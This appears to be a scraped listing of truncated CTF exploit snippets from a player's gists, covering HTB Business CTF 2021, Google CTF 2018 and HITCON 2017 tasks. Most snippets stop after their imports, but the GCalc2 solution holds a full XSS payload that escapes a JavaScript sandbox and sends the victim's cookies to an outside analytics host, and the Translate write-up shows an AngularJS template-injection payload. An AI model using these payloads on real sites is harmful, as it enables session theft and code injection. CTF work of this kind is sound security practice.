simple-pwn.py
'''
Exploit for the "Employee Manager" pwning challenge
HTB Business CTF 2021
DeteAct (https://pentest.global/)
'''
import re
from pwn import *
mips-pwn.py
'''
Exploit for the "Spim Panel" pwning challenge
HTB Business CTF 2021
DeteAct (https://pentest.global/)
'''
from pwn import *
def pack(x):
    return p32(x, endian='big')
zn2021_hackquest_quantum_service_exp.py
from math import pi
from socket import socket
s = socket()
s.connect(('quantum.kelte.cc', 17171))
prog = ''
# Hadamard for the 0th qubit
prog += 'H\n'
beched / gcalc2_exp.py
Last active Jun 27, 2018
Google CTF 2018 Quals: GCalc2 web task solution
from urllib import quote_plus
ga_tid = 'UA-***-1' # put your GA id here
url = 'https://gcalc2.web.ctfcompetition.com/'
url += r'?expr=vars.pi.constructor.name.constructor.constructor(vars.pi.constructor.name.match().constructor(vars).keys().constructor.keys(vars).pop())()&vars=%7B%22pi%22:1.0,%22'
url += quote_plus('''
script = document.createElement('script');script.src='https://www.google-analytics.com/collect?v=1&tid=%s&cid='+Math.random()+'&t=event&ec=email&el='+Math.random()+'&cs=newsletter&cm=email&cn='+document.cookie+'&cm1=1&ea=test';document.head.appendChild(script);
'''.replace('"', '\\"').replace('\n','') % ga_tid)
beched / translate_exp.txt
Created Jun 25, 2018
Google CTF 2018 Quals: Translate web task solution
This web application implements a translation service with a dictionary stored in memory.
One can dump the JSON dictionary and add values to it.
Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are web-site messages rather than words).
The solution is to overwrite the rendered dictionary value, then enumerate the methods accessible inside the AngularJS sandbox and find one that allows local file inclusion.
Executing Object.keys():
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}}
Reading the flag:
beched / sftp_exp.py
Last active May 9, 2020
Google CTF 2018 Quals: SFTP pwn task solution
import time
import sys
from collections import defaultdict
from ctypes import CDLL
from pwn import *
from z3 import *
s = Solver()
baby-exp.py
'''
HITCON CTF Quals 2017 BabyFirst Revenge v2 exploit
Task was to leverage 4-byte shell command execution in PHP to full RCE
'''
from requests import get, post
URL = 'http://52.197.41.31/?'
print 'Reset all'